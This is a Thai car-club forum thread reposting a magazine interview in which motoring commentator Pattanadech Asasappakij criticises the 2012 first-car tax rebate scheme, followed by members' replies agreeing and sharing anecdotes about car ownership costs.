ตอบ
domziia


ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 23 มกรา 2013 02:42 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
เกริ่นนำโดยกระปุกดอทคอม
ขอขอบคุณภาพประกอบจาก Way Magazine

            แม้สิทธิ์การขอคืนภาษีจากนโยบายลดคันแรกจะสิ้นสุดลงไปพร้อมกับปี 2555 แต่หลากหลายประเด็นคำถามก็ยังคงผุดขึ้นในใจของใครหลาย ๆ คน ไม่ว่าจะเป็น "โครงการนี้ดีจริงหรือไม่?", "ใครคือผู้ได้รับประโยชน์ที่แท้จริง?" และคำถามยอดฮิตที่ว่า "แล้วต่อไปรถจะติดขนาดไหน?" ซึ่งหลาย ๆ คนก็คงรู้คำตอบในใจอยู่แล้วล่ะ

            นิตยสาร Way Magazine ก็ได้เกาะกระแสเรื่องนี้เช่นกัน โดยได้ไปพูดคุยเรื่องนโยบายรถคันแรกกับ "พัฒนเดช อาสาสรรพกิจ" หรือที่คนในวงการรถเรียกว่า "น้าเดช" กูรูเรื่องยานยนต์ที่หลาย ๆ คนรู้จักเป็นอย่างดี และบทสัมภาษณ์ของเขาก็ถูกแชร์ในโลกไซเบอร์กันเพียบ เพราะมีมุมมองที่โดนใจใครหลาย ๆ คนไม่น้อย

            อย่างแรก ใครล่ะจะเชื่อว่า "น้าเดช" ผู้คร่ำหวอดในวงการรถมาหลายสิบปีก็เป็นหนึ่งในผู้ขอใช้สิทธิ์รถคันแรกกับเขาด้วยเช่นกัน เพราะรถ 8 คันของเขาก่อนหน้านี้ซื้อในนามบริษัท แต่รถกระบะป้ายแดงที่เพิ่งถอยออกมาใหม่ล่าสุด ถือเป็นรถคันแรกในนามชื่อตัวเอง ซึ่ง "น้าเดช" บอกอย่างตรงไปตรงมา ว่า "ก็ผมได้คืนเงิน ได้ประโยชน์จากนโยบายนี้ และมีกำลังที่จะซื้อด้วย"

            แต่สำหรับคนอื่น ๆ เขามีบางข้อมูลและความคิดมาสะกิดเตือนเกี่ยวกับนโยบายรถคันแรกที่กระตุ้นให้หลายคนได้เป็นเจ้าของรถของตัวเอง ลองไปติดตามบทสัมภาษณ์จาก Way Magazine กัน


คุณมีมุมมองและความเห็นต่อนโยบายคืนภาษีรถคันแรกอย่างไร?

            ถ้าพูดถึงรถคันแรก ต้องพูดอดีต วันนี้ พรุ่งนี้ อดีตคือตอนที่จะเกิด เป็นธรรมดาของทุกรัฐบาลไม่ว่าฝ่ายไหน ก็ต้องการให้ประชาชนชอบ เลยต้องมีนโยบายที่คิดว่าคนชอบ แต่ว่าการเกิดของโครงการรถคันแรก ด้วยความเห็นส่วนตัวผม แนวคิดดี แต่ข้อบกพร่องค่อนข้างเยอะ เช่น รัฐบาลจะไปช่วยธุรกิจอะไรก็ตาม มันต้องไปช่วยธุรกิจที่เอาตัวไม่รอด แต่ธุรกิจรถยนต์มันเป็นธุรกิจเฟื่องฟู ทำเท่าไหร่ก็ขายไม่พออยู่แล้วสำหรับประเทศไทย จะเห็นว่าแม้จะผ่านน้ำท่วมมาแล้วก็ยังขายถล่มทลาย ไม่มีรถคันแรกก็ตั้งเป้าอยู่แล้วว่า 1,100,000 คัน มันเป็นการไปช่วยธุรกิจที่ยืนได้อยู่แล้ว ทำให้มันเสียระบบ

            อย่างบริษัทผมมีพนักงาน 22 คน มีสิทธิ์จริง ๆ แค่ 3 คน ถามว่าทำไมไม่ซื้อ พนักงานผมบอก ไม่มีเงินดาวน์อยู่แล้ว 8 หมื่น ไม่ใช่พอไปซื้อลด 5 หมื่น แล้วจะดาวน์แค่ 3 หมื่น ยังไงต้องหาเงินมาดาวน์ 8 หมื่นอยู่ดี เพื่อรอคืนปีหน้า งั้นก็ต้องไปกู้ ตรงนี้ทำให้เกิดช่องโหว่

            ประเทศไทยเป็นประเทศเดียวในโลกที่มีการยืมเครดิตและสวมสิทธิ์ เธอไม่ซื้อเหรอ ฉันใช้ชื่อเธอนะ ฉะนั้นพวกเต็นท์ก็มาสวมแบบนี้ ซื้อรถที่ได้ส่วนลดเยอะ ๆ 8 หมื่น แล้วก็ให้ค่าชื่อ 1 หมื่น แล้วเขาบอกว่าห้ามโอน โถ…รถยนต์ร้อยละ 90 ในตลาดน่ะ โอนลอยทั้งนั้น

            ถามว่ายอดขายรวมปีนี้ผิดความคาดหมายไหม ไม่ผิดเลยครับ ถ้าคนในวงการจะรู้ว่าตัวเลขจะมากกว่านี้ด้วยซ้ำ ถ้ากำลังการผลิตมี ถ้ารัฐบาลไม่อั้นไว้ว่าไม่ส่งมอบให้ทันเกิน 30 มิถุนายนนะ ตัวเลขมากกว่านี้อีกบานเลย เพราะคนจะถูกยืมเครดิตมาซื้อเยอะมาก


ไม่ซื้อตอนนี้ก็โง่แล้ว?

            คือถ้าคุณคิดว่าคุณเงินเดือน 15,000 ผ่อนรถ 6,000 เหลือ 9,000 คุณคิดว่าไหว ผมว่าคุณล่มตั้งแต่แรก เพราะมันมีค่าน้ำมัน ค่าโน่นนี่อย่างที่บอก พอเข้าปีที่สองคุณจะเปลี่ยนยาง 4 เส้น คุณต้องเริ่มหาร้านผ่อนยาง 0 เปอร์เซ็นต์ล่ะ คุณบอกงั้นจอดทิ้งไว้ที่บ้านเฉย ๆ สิ คุณลองคำนวณเวลาคุณขายต่อสิ ว่าวันหนึ่งเงินคุณหายไปวันละเท่าไหร่

            คนที่ไปกู้มาซื้อจะยุ่งมากเลยนะ เอาเป็นว่าคืน หลังจากปีที่สอง หากคุณไม่มีกำลังผ่อนล่ะ ทำไง ไฟแนนซ์ยึด เขาต้องไปดูสภาพรถ คุณยังค้างหนี้อีก 4 แสน รถคันนี้ขายได้ 3 แสน เขาฟ้องคุณ 1 แสน อันนี้ไม่ใช่ปัญหา ปัญหาคือเงิน 8 แปดหมื่นที่คุณได้ ต้องคืนรัฐบาลนะครับ เพราะมีการเปลี่ยนมือแล้ว ก็มีคนถาม งั้นก็ไปขายโอนลอยสิ อ๋อ ถ้าโอนลอยตอนนี้เต็นท์รู้แล้วว่าคุณเดือดร้อน คุณจะต้องเสีย 8 หมื่น ราคารถคุณจะหายไปเท่าไหร่ เพราะเขารู้ว่าคุณจะโอนลอยหลังจากผ่านปีแรกแล้ว คุณเดือดร้อนแน่


พวกเจียนอยู่เจียนไปแบบนี้จะทำอย่างไร?

            สิ่งที่ผมแนะนำคือ เมื่อคุณได้เงินจากรัฐบาลแล้ว คุณอย่าเอาเงินก้อนนั้นไปทำอะไรเลยนะ คุณเข้าแบงก์ รอจนกว่าจะผ่าน 5 ปี แล้วคุณถึงจะเอาเงินตรงนั้นมาใช้ได้ คือไม่ใช่แค่คุณไม่มีปัญญาผ่อนอย่างเดียวนะ ขับ ๆ ไปรถสิบล้อชน ปัง! ปีที่สองที่สามไม่มีประกันชั้นหนึ่งแล้ว มีแต่ประกันกันชั้นสามแล้ว ได้เงินค่าซากมาคุณจะทำยังไงกับเงินก้อนนั้น ไปตัดไฟแนนซ์ที่เหลือ รถเป็นซากไปแล้วประกันต้องให้คุณโอนทะเบียนให้เขาอยู่แล้วเพื่อเอาเงินค่าซาก การโอนแบบนี้ รัฐบาลจะถือว่าเปลี่ยนมือไหม ถ้าเปลี่ยนมือคุณก็ต้องคืนภาษีสิ ยุ่งตายโหงเลยนะ



เรื่องนายทุนขู่จะย้ายฐานการผลิตหลังจากเหตุน้ำท่วมมีผลทำให้เกิดนโยบายรถคันแรกด้วยใช่ไหม?

            ผมว่ามันเป็นเรื่องคิดเอง พูดเอง ถามบริษัทระดับใหญ่ ๆ อย่างฮอนด้า โตโยต้า ก็ได้ เขาไม่อยากให้เกิดโครงการนี้หรอก เพราะหลังน้ำท่วมเขาเร่งผลิตอยู่แล้ว ถ้าหลังน้ำท่วม รถผลิตมากองเต็มตลาดไม่มีคนซื้อ ไอ้นั่นอีกเรื่อง แต่ทุกบริษัทยืนยันว่าปีนี้ทะลุล้านแน่นอนเลย เพราะเขาวางแผนการเติบโตเป็นขั้นเป็นตอนอยู่แล้ว แต่คุณไปเร่งใส่ปุ๋ย ทำให้เขารวน ปีหน้าเกิดอะไรขึ้น โรงงานขนาดใหญ่คุณไม่ต้องห่วงหรอก ทุนเขามี ระบบเขาดีอยู่แล้ว

            ถามว่าทำไมเมืองไทยเนื้อหอมสำหรับวงการรถยนต์ ผมบอกได้ว่า 1.โง่จริง 2.แกล้งโง่ ที่ว่าเขาจะหนีไปจากบ้านเรา ไม่หนีหรอกครับมีแต่จะมา โรงงานฟอร์ดที่ฟิลิปปินส์ก็ต้องปิดเพราะสู้เราไม่ได้ ที่ญี่ปุ่นยอดขายเขาตกฮวบทุกปีเลยนะครับ เพราะเขานั่งรถไฟฟ้ากัน ที่จอดรถก็ไม่พอ ขนส่งสาธารณะเขาดี


แต่ SME ได้ผลประโยชน์จากการผลิตอะไหล่?

            สิ่งที่คุณต้องห่วงคือพวกโรงงานเล็ก โรงงานน้อย SME ที่รัฐบาลอยากส่งเสริม Subcontract ทั้งหลายนั่นแหละ ปีนี้ (2555) เคยวางแผนว่าปีนี้จะส่งให้โรงงานโตโยต้า 100 ชิ้น ปีหน้าเพิ่มกำลังเป็น 110 ชิ้น อีกปี 130 ชิ้น อยู่ ๆ ปีนี้ปาเข้าไป 150 ชิ้น พวกนี้ทำไง ก็ต้องจ้างคนงานเพิ่ม ค่าแรงก็ถูกบวกเพิ่มเป็น 300 บาท ลงเครื่องจักรใหม่เหรอ ปีเดียวก็ยังไม่คืนทุน ปีหน้าพอกำลังการผลิตเขาถอยลง เขาคาดการณ์อย่างต่ำว่าลดลงแน่ ๆ 20 เปอร์เซ็นต์ แล้วพวกนี้จะทำยังไง นี่เป็นสิ่งที่คนในวงการรถยนต์เห็นกัน ทุกบริษัทบอกว่าปีหน้า ครึ่งปีแรกไม่มีผลกระทบหรอก เพราะยังผลิตรถส่งต่อ แต่ครึ่งปีหลังมิถุนายน เห็นผลตรงบริษัทเล็กจะดิ้นรนหนีตาย จะเกิดสงครามขึ้นอย่างรุนแรงในวงการ


ธุรกิจรถมือสองในปีหน้าจะเป็นอย่างไร?

            มันทำให้ธุรกิจรถมือสองตายไปแล้ว ตั้งแต่ประกาศโครงการ ถ้าคุณเป็นเจ้าของเต็นท์ คุณซื้อซีวิคมาไว้ในราคา 400,000 เพื่อรอขาย พอเขาประกาศโครงการรถคันแรก ถามว่าจะมีคนซื้อไหม คุณยอมซื้อซิตี้ดีกว่า ใหม่เอี่ยมเลย ได้ลดตั้งแสน ตลาดรถมือสองมันตายเลยไง

            มันจะตายต่อในอีกสองปี ยกตัวอย่าง คุณสองคนซื้อนิสสันมาร์ชรุ่นเดียวกัน สีเดียวกัน คนหนึ่งไม่ใช้สิทธิ์ซื้อในราคา 520,000  อีกคนหนึ่งใช้สิทธิ์ซื้อได้ในราคา 450,000 อีกสองปีคุณเอารถสองคันนี้ไปขาย ถามว่าตลาดรถมือสองจะตีในราคาต้นทุนเท่าไหร่ เขาจะตีในต้นทุน 420,000 คือคนที่ไม่ใช้สิทธิ์เนี่ย พูดในภาษาไทยว่า เสียค่าโง่ไปแล้ว ทำไมไม่เอาสิทธิคนอื่นใช้วะ ตอนขายยังเสียค่าโง่อีก นี่คือปัญหาใต้พรม

            เต็นท์ที่มียอดขายมากๆ ก็จะมีแบงก์เข้ามาอุ้ม ทุกวันนี้เต็นท์มันมีสังกัดหมดแหละครับ เต็นท์ยอดขายต่ำก็มีแต่จะแย่ เวลาแบงก์ยึดมาได้ก็จะเอามาประมูล เต็นท์ที่มีสังกัดก็จะได้ดอกเบี้ยถูก ได้เงินกู้จากเขาไปซื้อสินค้าจากเขา (รถที่ถูกยึด) แต่เต็นท์เล็ก ๆ จะลำบาก


แต่โครงการรถคันแรกถือว่าถูกจริตคนไทยอย่างจัง?

            คนที่ซื้อเพราะจำเป็นต้องใช้รถ มีวินัยการเงินดี ตรงนี้โอเคเลย ผมไม่ได้ไปแตะต้อง แต่คนไทย โอ้โห แม่งได้ลดตั้งแสน ไม่ซื้อเสียดายตายห่า พวกนี้แหละจะเจ๊ง ทั้งที่จริง ๆ ยังไม่มีความจำเป็นต้องซื้อเลย ยกตัวอย่าง คนที่มีบ้านอยู่บางแค บางใหญ่เริ่มทำงาน ซื้อรถคันแรกได้ส่วนลด ใช้ไปสามปี รถไฟฟ้าไปถึงล่ะ ถามว่าคน ๆ นั้นจะตัดสินใจยังไง 1.จอดรถทิ้งไว้ที่บ้าน ประหยัด นั่งรถไฟฟ้าเข้ามาทำงาน 2.กูมีรถแล้ว ดันทุรังขับเข้ามา น้ำมันก็แพง รถก็ติด 3.ขายรถ ก็นำเงินภาษีไปคืนรัฐบาล เพราะงั้นผู้บริโภคต้องวางแผนให้ชัดเจน ไม่งั้นเดือดร้อน


พฤติกรรมการซื้อรถของคนในบ้านเราเป็นอย่างไร?

            ผมพยายามบอกว่าคนไทยถูกหลอกว่าระบบโน้นดี ระบบนี้ดี คุณต้องการรถประหยัด แต่คุณไปซื้อรถที่มี mp3 เล่นซีดี กระจกขึ้นลงไฟฟ้าหมด ไม่มีความจำเป็นในการใช้รถเลย รถหนึ่งคันถ้าคุณถอดพวกนั้นหมดจากราคา 5 แสน เหลือไม่ถึง 4 แสน ไอระบบบ้า ๆ บอ ๆ ช่วยคุณจอด ถ้าคุณยังจอดรถไม่ได้คุณจะไปซื้อรถทำห่าอะไรวะ ระบบไฟฟ้าเปิดอัตโนมัติ มึงไม่รู้ว่ามันมืดแล้วมึงต้องเปิดไฟเหรอวะ กุญแจอัจฉริยะ หมุนกุญแจแค่นี้มึงจะตายเหรอ

            ผมเขียนไปแบบนี้ ฝรั่งเขียนมาด่าผมเช็ดว่าผมขวางการพัฒนาเทคโนโลยี แต่ผมคิดแบบคนไทยไงแบบลูกหลานผม สมมติเรียนมหาวิทยาลัยไกล ๆ หรือที่ทำงาน ถ้ามีรถไปเพื่อไป-กลับแค่นี้ คุณจะไปมี GPS เพื่อห่าอะไร คุณหลงทางเหรอ แค่ไปมหาวิทยาลัย ที่ทำงาน บางคนก็บอกผมว่าพี่ก็พูดได้ ผมอยากมีรถสักคันก็อยากได้ตัวท็อปสุด โอเคผมก็ไม่รู้จะว่าไง



หรือเพราะประเทศไทยปล่อยให้ครอบครองรถง่ายเกินไป?

            วัฒนธรรม… การคิดแบบไทยมันสวนโลก ยกตัวอย่างมอเตอร์ไซค์ก็ได้ สมัยผมต้องอายุ 18 ถึงมีใบขับขี่ได้ ต่อมาก็ลดเหลือ 15 ปี เด็ก 15-16 รับผิดชอบอะไรได้ ปัญหามันเลยเกิดไง คนขับรถยนต์ 18 ได้ใบขับขี่ล่ะ แม่งซักผ้าเองยังไม่ได้เลย แต่คุณให้ขับรถขึ้นไปบนถนน ผมถึงไม่เคยโทษพวกนี้ไง เพราะสังคมเห็นด้วย อนุมัติเขา สังคมคือกฎหมาย ก็เรายอมให้เกิดแบบนี้ สมมติว่าเซ็นทรัลไม่ให้จอดล่ะ เดี๋ยวเช่าที่แดนเนรมิตให้แล้วเดินมาใกล้ ๆ คุณว่าจะมีคนเข้าห้างเขาไหม ไม่มีหรอก

            คือมันผิดตั้งแต่กระบวนการทางความคิด เราส่งเสริมอุตสาหกรรมรถโตขึ้น ให้คนซื้อรถง่ายขึ้น คิดได้ยังไง แทนที่จะโตแบบมีคุณภาพ คนบ่น ไปจำกัดมากเดี๋ยวรถมันขายไม่ได้ คนจะตกงาน คนกลัวรถจะขายไม่ได้ไง เลยทำให้เราได้คนไม่มีคุณภาพเข้ามาอยู่ในรถมากขึ้น ผมไม่ได้บอกว่าทุกคนต้องขับเก่งหมด แต่รถมันเป็นเครื่องจักรอันตราย ต่อคุณและคนอื่น แล้วเราจะได้ของอันตรายบนท้องถนนอีกเยอะมาก

            นิสัยการขับรถก็อีกอย่าง คุณลองคิดสภาพนะ รถจอดรออยู่สามแถว อยู่ ๆ มีคันหนึ่งเลาะไหล่ข้าง คุณคิดล่ะ ไอ้ห่านี้มารยาทไม่ดี คันที่สองมา พวกนี้เลวเว้ย คันที่สามมา คุณคิด หรือกูต้องไปกับมันวะ พอคนที่ห้ามา คุณคิดล่ะ กูโง่ฉิบหายทำไมไม่ไปกับมันวะ แล้วคุณก็ต้องไปกับมัน บางทีผมก็ไปนะ ยอมรับเลย คือสังคมมันกลายเป็นว่า คนโง่เท่านั้นที่ทำตามระเบียบ

            คนไทยเราชอบทำตัวเป็นตำรวจ เป็นอัยการ เป็นศาลได้หมดบนถนน กูไม่ให้มึงแซง พอขี่ช้าต้องบีบแตรไล่ พอแซงได้ต้องลงโทษ โฉบปาดหน้า เป็นศาลตัดสิน ไอ้นี่สมควรตาย กูจะเบียดมึงให้ตกถนน ถนนทุกวันนี้มันเหมือนโคลิเซี่ยมสมัยโรมัน สัตว์ร้ายที่เข้มแข็งเท่านั้นจึงจะอยู่รอด ไม่มีการให้อภัยกัน ทุกคนเอาคืนกันหมด


ทำไมบางคนมีคอนโดฯ ติดกับรถไฟฟ้า ก็ยังต้องซื้อรถยนต์อยู่ดี?

            ผมถึงบอกว่า นโยบายรัฐบาลอยากช่วยประชาชนรากหญ้า แต่มันไม่ใช่ เพราะรถส่วนใหญ่ของโครงการมันเป็นรถใช้ในเมือง รถขนาดเล็ก แต่ถ้าเป็นตัวหลักเลยนะครับ คือวัฒนธรรมไทยเรา คนไทยรอไม่ได้ถ้าแถวยาว อีกอย่างในกรุงเทพฯ มันเป็นเมืองประชากรหลั่งไหล รกรากในกรุงเทพฯ มีอยู่สัก 30 เปอร์เซ็นต์ ที่เหลือจากต่างจังหวัด ทีนี้พวกเทศกาลไทยต่าง ๆ สงกรานต์ฉันต้องกลับบ้าน เข้าพรรษาต้องไปหาแม่ เป็นต้น


ไม่ปลื้มระบบขนส่ง?

            เนี่ย คือระบบ Mass Transit ขนส่งมวลชนสาธารณะบ้านเรามันไม่ต่อเชื่อม อย่างที่บอกว่ากรุงเทพฯ เป็นเมืองอพยพไง พอถึงเทศกาลก็กลับบ้านเกิด รถทัวร์เต็ม รถไฟเต็ม เครื่องบินเต็ม กูมีรถดีกว่าวะ ชั่ว ๆ ดี ๆ เอาไว้กลับบ้าน แต่ถ้ารัฐส่งเสริมระบบพวกนี้ดี ๆ ความจำเป็นในการมีรถจึงจะน้อยลง

            ระบบขนส่งมวลชนพวกนี้ก็ไม่วางแผนตัวเอง แม้กระทั่งแบบผูกขาดอย่างรถไฟยังเจ๊ง ไม่น่าเป็นไปได้ อะไรที่รัฐทำเนี่ย เจ๊งหมด บขส. รถร่วมรวยเอา ๆ ผมเห็นนครชัยฯ ซื้อที่วิภาวดี ถามว่าไร่ละเท่าไหร่ การวางแผนของรัฐมากกว่าที่เป็นปัญหา แบบที่ญี่ปุ่น ขนส่งสาธารณะในญี่ปุ่นสบายมาก มีรถบัสบริการตั้งแต่สนามบินถึงโรงแรม แต่บ้านเราไม่ได้หรอกถ้าเอารถบัสมา แท็กซี่ป้ายดำแม่งทุบ แท็กซี่รวมหัวกันปิดสนามบิน คุณเชื่อผมไหม พูดยากเหมือนกัน


ถ้าขยายระยะเวลาของโครงการรถคันแรกให้ยาวออกไป จะเป็นอย่างไร?

            ถ้ามีอีกก็ฉิบหายครับ ใครฉิบหาย ก็ทั้งหมดแหละครับ บริษัทรถก็ฉิบหายเพราะสินค้ามันไม่ได้ยืนอยู่บนพื้นฐานความเป็นจริง เป็นภาพลวง บริษัทที่ไม่มีรถเข้าข่ายเงื่อนไข รถนำเข้าตายสนิท รถมือสองฉิบหายแน่ ไฟแนนซ์ก็เหมือนกัน อันสุดท้ายคือประชาชนแหละครับ ฉิบหายจากอะไร คือคนไทยเราไม่สนใจเรื่องเครดิต พอเข้าปีที่สามรถมันต้องเริ่มซ่อมละ คุณหาทางทิ้งเพื่อซื้อคันใหม่ ถ้ามีต่อแล้วร่างกติกาใหม่ก็อาจจะดีขึ้น ผมก็ไม่รู้ แต่ถ้าภายใต้กติกานี้ก็ฉิบหายแน่



ที่มา http://men.kapook.com/view53882.html
domziia


ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 23 มกรา 2013 02:43 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
ยาวหน่อยนะครับแต่ข้อคิดเพียบ
Pantamitr


ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ที่อยู่: บางปู สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 23 มกรา 2013 08:06 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
ชอบมากๆครับ คุณอาพัฒนเดช น่าจะได้เข้าไปทำงานร่วมรัฐบาลบ้างนะ จริงๆนะ คนในรัฐบาล ทุกรัฐบาลแหละ ไม่ได้มีความคิดรอบด้านแบบนี้

หลายเรี่อง โดนจังๆ อย่าง ถ้าขับรถไปชนจนเป็นซาก แล้วทำไง ซวยซ้ำซวยซ้อน นี่เป็นภาพที่มันซ่อนอยู่ หลายคนมองไม่เห็น

หรือ ถ้าซื้อรถราคาปกติ ทั้งๆ ที่รุ่นนั้น เข้าข่ายได้ส่วนลด 1 แสน แต่ตอนซื้อไม่ได้ลดกับเขา พอไปขายต่อ เขาก็ตีเป็นราคาได้ส่วนลดแน่ๆ

เพราะฉะนั้นคนขายต่อ ไหนจะขาดทุน ค่าเสื่อม ไหนจะขาดทุน ส่วนลดที่ไม่ได้ลดอีก ซวยกันเข้าไป ฯลฯ

คุณอาพัฒนเดช แกเป็นคนใช้ชีวิต จริง และแกผ่านประสบการณ์หลายอย่าง แกจึงมองเห็นอะไรได้รอบด้านกว่า ไม่ใช่เฉพาะเรื่องรถ

เรื่องการใช้ชีวิต แกก็มองเห็นหมด

ผมถึงว่า แกน่าจะได้ทำงานร่วมกับรัฐบาลนะ ได้ทุกคณะเลยยิ่งดี

อันที่จริง กูรูเรื่องรถ ในรัฐบาลก็มี ชื่ออะไรนะ นึกไม่ออก นั่นแม้จะไม่เชี่ยวชาญเท่าอาพัฒนเดช แต่

ก็น่าจะรู้และทักท้วงบ้าง นี่เอาแต่บ้า กัดเขาไปทั่ว เฮ้อ
ได้รับคำขอบคุณจาก: AofStaR 
davidian


ชื่อเล่น: เอ็ม

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2420
ให้คำขอบคุณ: 4730

ที่อยู่: บางสิบหมื่น ชลบุรี -แปดริ้ว ฉะเชิงเทรา-บางนา สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 23 มกรา 2013 08:18 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
นี่แหละความจริง
popza4


ชื่อเล่น: อ้น

เข้าร่วม: 19 กรกฎา 2012
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 3347

ที่อยู่: จรัญสนิทวงศ์ 95/1
ปี: 2001
สี: แดง ไฟร์เปปเปอร์ (R-507P)
พุธ, 23 มกรา 2013 08:59 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
ทุกวันนี้อย่าว่าเเต่รถติดเลยที่จอดรถแทบจะไม่มีที่จอดกันอยู่เเล้วกลับคอนโดทีต้องรีบกลับไม่งั้นไม่มีที่จอดรถ
prgs55


ชื่อเล่น: เล็ก

เข้าร่วม: 26 มิถุนา 2010
ตอบ: 861

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1794
ให้คำขอบคุณ: 1103

ที่อยู่: ย่านมีนบุรี
ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 23 มกรา 2013 09:35 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
น่ากลัวจังครับ กับเงิน 1 แสนที่ได้มา ต้องเก็บไว้อย่างดีเลย ในเวลา 5 ปี
Mac


ชื่อเล่น: ปู

เข้าร่วม: 26 กันยา 2009
ตอบ: 932

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 306
ให้คำขอบคุณ: 156

ที่อยู่: RAMA II Rd.
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 23 มกรา 2013 10:30 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
ความจริงที่ต้องยอมรับ และต้องก้าวผ่านไปให้ได้ ในฐานะคนไทยคนนึง 
Pete Villian


ชื่อเล่น: พีท

เข้าร่วม: 08 พฤษภาคม 2009
ตอบ: 534

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 876
ให้คำขอบคุณ: 402

ที่อยู่: อโศก-ประเวศ-มีนบุรี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 23 มกรา 2013 12:01 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
คนใช้สิทธิ์ที่ผมรู้จัก  ส่วนมากเกิน 70% แทบจะไม่มีความรู้เรื่องการบำรุงรักษาเครื่องยนต์เลย.......รู้แต่ว่าออกรถใหม่มาขับ จ่ายแค่ค่าน้ำมัน กับค่างวดรายเดือน  เวลาไปสอน ก็มาหาว่าอิจฉารถป้ายแดงที่รถเก่าต้องมาคอยซ่อมนู้นนี่ .......อืม.....เยี่ยมไปเลย
Rachen


ชื่อเล่น: เชน

เข้าร่วม: 03 พฤศจิกา 2012
ตอบ: 1422

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1495
ให้คำขอบคุณ: 2881

ที่อยู่: บ้านฉาง ระยอง และ สตาร์พลาซ่า ระยอง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 23 มกรา 2013 12:16 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
คันแรกของผมก็น้อง ES เนี้ยแหละไม่จำเป็นต้องป้ายแดง
            
            ผ่อนสบายๆไม่ต้องไปกินมาม่า ที่สำคัญ หล่อมว้าก
kan32737


เข้าร่วม: 30 เมษา 2012
ตอบ: 135

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 0

ที่อยู่: พิษณุโลก กรุงเทพ
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 23 มกรา 2013 12:54 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
Pete Villian พิมพ์ว่า:
คนใช้สิทธิ์ที่ผมรู้จัก  ส่วนมากเกิน 70% แทบจะไม่มีความรู้เรื่องการบำรุงรักษาเครื่องยนต์เลย.......รู้แต่ว่าออกรถใหม่มาขับ จ่ายแค่ค่าน้ำมัน กับค่างวดรายเดือน  เวลาไปสอน ก็มาหาว่าอิจฉารถป้ายแดงที่รถเก่าต้องมาคอยซ่อมนู้นนี่ .......อืม.....เยี่ยมไปเลย


ถูกต้องครับ คนใกล้ๆตัวผมด้วยอิอิ ห้ามเสียงดังเดี๊ยวโดนตบ   จะเอารถ หรูๆ ใหญ่ๆ  สวยๆ ไม่รู้หลอกว่า ยางเอย น้ำมันเครื่อง และอีกหลายอ่างมันต้องจ่ายไรมั่ง  รถยิงหรู ยิ่งใหณ่  ยิ่งแพง ทำไมไม่เข้าจ เอาแต่ขับ  ขับน้องขาวสุดรักของผม ไอ้นู่เสียที นี่เสียที  ผมขับไม่เคยเป็นห่าไรเลย ขอบ่นหน่อยนึงนะคับ ไม่มีที่ระบาย TT   ตอนผมใช้รถสะอาด ดูดี ไม่มีอะไรเสีย  คุณเธอเอาไปใช้แป๊ปเดียว รถหรือรังหนูว่ะ นู่นเสีย นี่เสีย ถอยรถขูดเสาอีก ตั้งแต่เกิดมาขับรถ ยังไม่เคยขับรถคันไหนเฉี่ยวชน เลย    สุ้ท่าย กรูก็ต้องซ่อมเองอีก 
tewada


ชื่อเล่น: ต้น

เข้าร่วม: 15 กันยา 2009
ตอบ: 489

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 546
ให้คำขอบคุณ: 456

ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 23 มกรา 2013 13:43 - แชร์กันเพียบ! รถคันแรก...จากมุมมอง พัฒนเดช กูรูเรื่องรถ
" คือสังคมมันกลายเป็นว่า คนโง่เท่านั้นที่ทำตามระเบียบ "


อ่านแล้วชอบใจมากครับ สังคมไทย เป็นแบบนี้กันจริงๆ


boymac


เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 997
ให้คำขอบคุณ: 231

ที่อยู่: อ.บางบัวทอง จ.นนทบุรี 11110
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
